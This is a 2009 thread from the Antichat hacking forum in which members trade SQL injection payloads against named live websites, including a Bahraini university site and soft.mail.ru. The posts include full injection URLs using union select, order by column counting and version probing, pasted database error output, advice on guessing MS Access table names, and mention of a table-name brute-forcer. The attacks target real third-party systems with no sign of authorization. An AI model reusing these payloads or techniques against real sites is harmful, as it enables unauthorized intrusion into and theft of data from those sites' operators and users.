Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

29.03.2009, 23:43
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Там два запроса, их отлично видно в ошибке
1-й 3 поля, без вывода
Erreur dans la requete : select titre, date_format(datd, '%d/%m/%Y') as dd, id from podc where id_prg=3/**/order/**/by/**/4/* order by datd desc, titre
2-ой 5 полей выводится
Erreur dans la requete : select nom, anim, photo, corps, horaire from prog where id=3/**/order/**/by/**/6/*
|
|
|

30.03.2009, 00:06
|
|
Новичок
Регистрация: 29.03.2009
Сообщений: 5
Провел на форуме: 17150
Репутация:
0
|
|
ниатдам вам урл, хочу сам добить.(+урл в паблике вызовет фикс бага)
запрос: '+AND+1=(SELECT+name+LIMIT+0,1)/*
Column 'name' in field list is ambiguous - что это значит?(перевел, все равно не понятно как боротся с неоднозначностью???)
|
|
|

30.03.2009, 00:40
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от LLIop0x
ниатдам вам урл, хочу сам добить.(+урл в паблике вызовет фикс бага)
запрос: '+AND+1=(SELECT+name+LIMIT+0,1)/*
Column 'name' in field list is ambiguous - что это значит?(перевел, все равно не понятно как боротся с неоднозначностью???)
Это означает, что колонки "name" не найденно 
|
|
|

30.03.2009, 01:01
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме: 81772
Репутация:
10
|
|
У меня вопрос по MS Access. Есть сайт http://www.ruw.edu.bh/template2.asp?id=218
Подобрал кол-во полей с помощью order+by, их оказалось 13. Попробовал угадать имя таблицы, угадал таблицу user. Но при таком запросе
http://www.ruw.edu.bh/template2.asp?id=-218+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+fro m+user
Выводит какую-то ошибку...( Что я не так делаю?
|
|
|

30.03.2009, 01:34
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Access имеет зарезервированные слова и символы которые нельзя использовать абы как
В данном случае ничего ты не нашёл, user не может быть таблицей, как и любое из этих слов :
http://office.microsoft.com/ru-ru/access/HA100306431049.aspx
|
|
|

30.03.2009, 01:38
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 53
Провел на форуме: 162004
Репутация:
100
|
|
select+from+user использовать нельзя
вот прочти ещё это:
https://forum.antichat.ru/showpost.php?p=898813&postcount=25
Последний раз редактировалось Soviet[HZ]; 30.03.2009 в 01:40..
|
|
|

30.03.2009, 02:16
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сделал брутер для именно этого сайта (Access) по словарям от SIPT4 - ни одной таблы не нашел, гы
если интересно, путь:
'c:\windows\system32\inetsrv\
Интересно, у кого-нибудь есть словари для ACCESS? А то скрипт есть, а словаря нормального на такие случаи нет 
Последний раз редактировалось Pashkela; 30.03.2009 в 02:19..
|
|
|

30.03.2009, 17:29
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме: 1686744
Репутация:
246
|
|
Собственно просто так выкладываю так как просто красивая ошибка жаль правда не че вывести нельзя.
Код:
http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/order/**/by/**/99%23
|
|
|

30.03.2009, 17:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Почему нельзя, 4-ая ветка:
Код:
http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/and/**/substring(version(),1,1)=4%23
|
|
|

30.03.2009, 17:39
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме: 1686744
Репутация:
246
|
|
Сообщение от Pashkela
Почему нельзя, 4-ая ветка:
Код:
http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/and/**/substring(version(),1,1)=4%23
Ну че то я не вижу версии  Или я не туда смотрел 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|